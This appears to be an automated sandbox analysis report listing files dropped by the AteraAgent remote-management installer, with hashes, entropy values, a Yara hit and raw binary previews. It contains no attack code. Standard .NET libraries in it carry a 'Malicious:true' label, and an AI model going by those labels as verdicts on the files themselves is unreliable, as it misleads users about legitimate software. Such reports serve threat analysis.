                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>.. <supportedRuntime version="v4.0" />.....</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.67419471304358
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Ky/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOq5eFQ:KuhMaVmzDC6k0EpYi60GFQ
                                                                                                                                                                                                                                                                                              MD5:8802D420754BF1D2D0375E7616A8C0E7
                                                                                                                                                                                                                                                                                              SHA1:A6F98EE725ACD9143BB2513EEBC7D21BE055B6D3
                                                                                                                                                                                                                                                                                              SHA-256:F9084AEDB6F80B41B1018F1983A746DC15AC290B5BF7D3096F68716049485997
                                                                                                                                                                                                                                                                                              SHA-512:7627A626774ADCCEAF0461815AB8987C74DDFBACA401C734BE886DB8D8C9EA7FF9F1CE4CB50F1AF331C9B81823063EEF36C789B41583B7C60A1A5D05F90AC9A2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ...............................E....@.................................sC..O....`..@...............((...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.266246479247275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:mYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zr1C:mKC9niwOepJ6TJPeb6NIUFg76Kzrc
                                                                                                                                                                                                                                                                                              MD5:9057AF1C1137747ED13F9F1D1A60D3F8
                                                                                                                                                                                                                                                                                              SHA1:6CAA9C3E940D3C5B8E0712ED5BD6A808FD7A1972
                                                                                                                                                                                                                                                                                              SHA-256:FBF397A93F036A5A6BCFD5E9A0284CF0176BD14DE64E4112F62B9907EBB7A275
                                                                                                                                                                                                                                                                                              SHA-512:45C09D503CF659063331BBFCB584BAA3145BD15853AA4D6D796869EC6C26EA9F3DE41FD93C95770421F7DD3B080B6DABA0BB461D5A591DEB59CCD4FF27CE6E1B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@...........`.................................k...O....... ...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.178878143933301
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:NP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJHf:Nh0qjC5RMOHO420kN1U
                                                                                                                                                                                                                                                                                              MD5:22F621864F912999153ABBB388FA2201
                                                                                                                                                                                                                                                                                              SHA1:B8DD279077A56F232B88E760E86EAB6E1643A27A
                                                                                                                                                                                                                                                                                              SHA-256:F37138000A2A7B659746C2F1B5B04662EA3C6F3BBB99D8431E501E7C1A48B6B2
                                                                                                                                                                                                                                                                                              SHA-512:A9A961EF94204D86A7F1DFF09F27647D205DEE0F66F6ABAA3BA24FE433A43577294D985F26A605D8D71A898BDE0EA2B7D2D9BA6904505D8E0DCE0E8A043D5343
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......N{....@.................................3...O.... ..0...............((...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6358275792286925
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:6TO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF08II:6Cn6xYEpYi60k8J
                                                                                                                                                                                                                                                                                              MD5:EE85382C1837ED5F63F224AA54F55114
                                                                                                                                                                                                                                                                                              SHA1:021EF0F6D8AA0B7E6220AABEA662CCF552D28255
                                                                                                                                                                                                                                                                                              SHA-256:780A4CC22F54F6363E140A85A209348123CC95E50459EBCFFAC94658728D40A3
                                                                                                                                                                                                                                                                                              SHA-512:B7EA109B76D80F4E811DAE61259F50064F5240FFE47EEBD40D0F7FDAAB9292C5003CD6EE5916EE11B444B78CF3F8A3707AEEAA4A8B86B61C8A56DEAC53E649D9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^...........!.................1... ...@....@.. ..............................E.....@..................................1..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H........#......................P ......................................O..q.<.P$[p.;a<...Ci......K..!..&.d...FaLJ.....f..........w.E.E........(y...,.Lr..R..........T.z....5..;.. ....&V.=}.... .0.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0................*..0...............*...0...............*...0..........

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27176
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332263296888565
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Qn1VM0JrpNWDcIh6leOiDFIFBYp1+yWEpYi6018:QnvXYcIh6yFIFBYpcyX76T
                                                                                                                                                                                                                                                                                              MD5:CA05B735DDFC8455DE0DCEB9F0D61AA0
                                                                                                                                                                                                                                                                                              SHA1:1CFF8FA91F93C9AFED0DE4A3755C294F2EF73E30
                                                                                                                                                                                                                                                                                              SHA-256:B639135A02AADB17FE574E926958DDCADEDB7D6AB1AE6B6A922A019D5E90DAE2
                                                                                                                                                                                                                                                                                              SHA-512:85D9DA312F667633AB86508D0CBE08537B9FB933D823532B0F610C05316BD92510DB63CC48153A7E4B419C00AAB7158B4D0BDD887A1E4C366FCE7D9C0E966977
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..((..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3264840
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999888526840204
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:98304:tXocgF/bGeL2rNCmtrWUw5WjYtwmiwzYi:tdC/SSg9zjYtwhwl
                                                                                                                                                                                                                                                                                              MD5:8E70AF11D0EE2ABE139B40D67E70B73C
                                                                                                                                                                                                                                                                                              SHA1:18582E88E16255D5D267904BDF0357EC9FF333E0
                                                                                                                                                                                                                                                                                              SHA-256:5C687ADAA48B83DE220E8489E0CEB0093BE1F94260750C8D94A1B8497781327E
                                                                                                                                                                                                                                                                                              SHA-512:3A845ED4AB368B0DDE7E98D77FB796E9070F6BB9472EA833E52B19EB5BD47260E0B288FD3C8D19235BD9DED6F7B11EA10985AD871C8F5C82751249301D3EE4A6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....+a.Y$........../...AgentPackageTicketing/AgentPackageTicketing.exe....(........H........b.F..n..|.i.@.....>}X].C....E.6.Et.p......u4a5....;).:.|.j..5.8`.%.k....9...>H....{."[.E8.... ......N....yR..m..E....r..{h.o..d.{z.{..O.0w......[.....^...J.(h..H}........)z.0..d.3.... ....X49.;.Q...........FY.~5.?....NB..!.^...........!....}.X.!u..c.x.......zl...~j=...(.I..X9....<&..H..1..R.!...IxR..q...e0..\.9.*.U....6...@.-.4..........L5.\;'.6.s3.1...KrFJ.........^.{K.SJ.Y..(*.bI.>.K...:..}...`...X...\b.#.......K.;..h...../.h9H...|...T.tWqe....}.!...$.'[L!Z.......r....|..P...'Oy.V..&.]..>\b...z5W.x.VN.#.<.j..MF. `...]...<...'w.Jy$...74R.Fe..;J&w.=U%..............uYP.....q./.Y...$.X./d....._.W..T.+.c&?D..=.s..7.vo..]I..L.e..D......OO.^....!F/.0.i..19h>....v...i..i....j....n;........P.<Y1..T.a....a.....Js..l..Q.e.bMAw.H.$....s^.p.x..G..C.....j.W3....C.~fS...D....N......*.3.8.5.2omy....?.>N...........%..jK.:N.o..u...f...#..(.....,J..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):33320
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.272339196658384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:a2G6bukIMKWcoIQEIhL4lylU9OfWtkfoi75yHiDMMXpO66REVmlRSNyb8E9VF6I+:PLKF6EIR4lXsIEDLseVmlRyEpYi60+D1
                                                                                                                                                                                                                                                                                              MD5:2EC1D28706B9713026E8C6814E231D7C
                                                                                                                                                                                                                                                                                              SHA1:7EF12A01182D28A5EBF049CC1CB80619CD1E391A
                                                                                                                                                                                                                                                                                              SHA-256:C9514BF67DF87AC6CC1002F3585D5B6F7D4093A7A794D524FA8C635F052733DE
                                                                                                                                                                                                                                                                                              SHA-512:9E23588DC6D721F42E309974C3F3089F845F10D1DEE87FB26213BA3810EE3C272D758632CF1C9157F6862BA0E582AFC49C1EE51540461F41840650F216F35AEB
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:Rig.........."...0..N..........~l... ........@.. ..............................{.....`.................................,l..O.......4............Z..((...........j............................................... ............... ..H............text....L... ...N.................. ..`.rsrc...4............P..............@..@.reloc...............X..............@..B................`l......H.......@4...6...........................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o......s....%.o........o......s...........s....%......io....%o......o........o....o......(....*..0..........r...p... .....r...p.(.....o......(.....o.......(...........s......[o......s....%.o........o .......s!..........s.......i.......%......io".......o....o....(.........o#...*..($...*...0..~.......~....r-..po%...(.....(&.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1537
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0063120500114895
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FV0PH2/+w3VUrPH2/+789y:3sIk7O7RgdjdgFSagFsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:C3CA0AD8FE91D02044029A11A9480B1F
                                                                                                                                                                                                                                                                                              SHA1:1FB4C1063460C48AC77D3D4702697A35727A5E51
                                                                                                                                                                                                                                                                                              SHA-256:B2AED8BAB56D0FDBD1D6F1277A3257DFFBFD107BEB19320C0D1F4DC0E4AD3AEF
                                                                                                                                                                                                                                                                                              SHA-512:50B18B6DD91CB691C8B77AB612A7172CE59881705A52F59880A29A0F81E910A61D3D4506AB53B1F945611AFE079B96A896F3F01442D3B68801B2748C68AE01F6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhWA:Wp
                                                                                                                                                                                                                                                                                              MD5:9A5E9A329E4E73E0C499371205A810DB
                                                                                                                                                                                                                                                                                              SHA1:5B6D85657D4ACD89867283FBE372E9E85C30686F
                                                                                                                                                                                                                                                                                              SHA-256:D109087C4CA318CAD74B7560C32594D37181885ADBDC9348BA1DD35D47B35B92
                                                                                                                                                                                                                                                                                              SHA-512:02BD5261B9E795ED5A07BADD65A6CF71D18751452FB44BDD424DFCC6C50BA7441E0066B125E731018FD6F1A8A002AC4E6961C7EFF21C36FBDA58C8015A100C43
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=30.3

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):112168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.180159202167914
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:BgssVbDRgWchiMWXRIe0ZMTR8U3XTknAxb2waOn3ybQgLbYpm8GRUdokEWUpj76y:BUpviy8UHTRxrybQgLbGm8FUpjR
                                                                                                                                                                                                                                                                                              MD5:5114EBB60AC0416A62499F4CB632FC87
                                                                                                                                                                                                                                                                                              SHA1:2E38B97A6A1EA9B36F64339DD7FC3C58083ABAA6
                                                                                                                                                                                                                                                                                              SHA-256:CC93928F16DADCDAB232332825BB744CD1E6AEC55E59EA14977AEF413EACD0FD
                                                                                                                                                                                                                                                                                              SHA-512:07E673BA52EE82C59E6C3FFC9CF95F39BBFB7903E449A9AA49893879A94A61BB9296D653631DF5FEEB1EB9787512C6008901054C5A2509EDD7132F9477309942
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g.........." ..0................. ........... ..............................=[....`.....................................O.......8...............((..........L................................................ ............... ..H............text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H.......0...."...........................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p( ...r...p(!.........("...(#.....&..*........00......:.(......}....*..0..Z............($...,......(%...*~..........(&........($...-..(....s'...........,..((.........(%...*..........&E.......0..G........{....,.(......5~)...r'..po*...rm..pr...po+...ta...r...p(,..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CommunityToolkit.WinUI.Notifications.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2032780562233345
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhj:X9XeDmzV2yzlhKLFU1lLVp1+2flYFnQi
                                                                                                                                                                                                                                                                                              MD5:4423EF97B513D7BA0D2EEB1FCA4D28E2
                                                                                                                                                                                                                                                                                              SHA1:7BD205977CBA7A6C21C89C5C9FEAA010B9C9298D
                                                                                                                                                                                                                                                                                              SHA-256:EEC63220063690D7D953A1FB8F3798AE7D277A36482AD4EB804D526A7FE7C71A
                                                                                                                                                                                                                                                                                              SHA-512:316C3C0478FC11FE7C94A31F895E7084FAD4F7C9ED08E19DD30536038FFA80C2B7AF769AFC9C51A2EABDBADA71912BC685E62FFB1123207663F9079BA4D96BFE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nI..........." ..0.............v$... ...@....... ...............................X....`.................................#$..O....@..|...............((...`......,#..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................W$......H.............................."......................................V!.b.....s&........*..{....*"..}....*..0..Z........(....o'...-.r...ps(...zs......(....o)....+..o*.....o.....o0...o+....o....-....,..o......*........*.$N......J.s,...}.....(-...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(D...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(E...%.(....o"...%.(....o$...%.(....o ...%.o....*..(-...*..{....*"..}....*..{ ...*"..} ...*..{!...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):38952
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.310169343696597
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:eINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgVK:XNsii6v/HS0+OJd5gpKm76tgI
                                                                                                                                                                                                                                                                                              MD5:FC2E2EB6AA0EB01DEB3D5DDE95216C5D
                                                                                                                                                                                                                                                                                              SHA1:11DAAA7ED638922C8CF473A4FF3BA56224510BFE
                                                                                                                                                                                                                                                                                              SHA-256:862AA98B7C3A28A5B8377BA18BAB84D1D8D289A2EE5ACEB56DE43176CCDEF1C8
                                                                                                                                                                                                                                                                                              SHA-512:A1216C57AE85612F2A48FB7988B61B449343963EF273B26CAE74D1AB18790872961A8AC2EDCA389B00C5C85B82B645F218F784F98F4F6125E6D3B7E00B7E45B1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..T...........!.....f............... ........... ....................................@....................................O....................p..((........................................................... ............... ..H............text...$d... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H........2...O...........................................................0..+.......s.........~....%.(.....s............(.....*..........#........,..%{.....`}....*.%{.....f_}....*..0..>.......................(....}=......}>......( ...}@......(....}?....*R.{....,.r...ps....z*:..(.....(....*...0............(.......(.....*...................J.{....-..&..}....*6.(.....{....*:.(......}....*6.(.....{....*..(.....(....,.r]..ps....z.o ... ....1.r]..ps!...z..}....*6.(.....{....*..(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):29224
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.670756678192546
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:3mYaXzmSJL6guJrdvc5tIZmQCaBj4QU3hOTVTDvAGvoOCcdcOFyF606Nyb8E9VFL:1SJh5tIYQzT5zyF60aEpYi60uc
                                                                                                                                                                                                                                                                                              MD5:54A2B1EC2667987A308A52DEDF33C0D5
                                                                                                                                                                                                                                                                                              SHA1:556461805105DCB765B7DC5D0E110B82908226DB
                                                                                                                                                                                                                                                                                              SHA-256:1C9A08BC7802BD9F2486B4C967DF27729AE8805B0B6664A257C951ACA199B04D
                                                                                                                                                                                                                                                                                              SHA-512:28A478AC767843924D4B90D42F3A40F033971CE0EDEC7D94BDB86C2659B8605051983C7F9B8223961D1866364F78DDACB6D613F09BF8ECFC1A209D3515FCE264
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
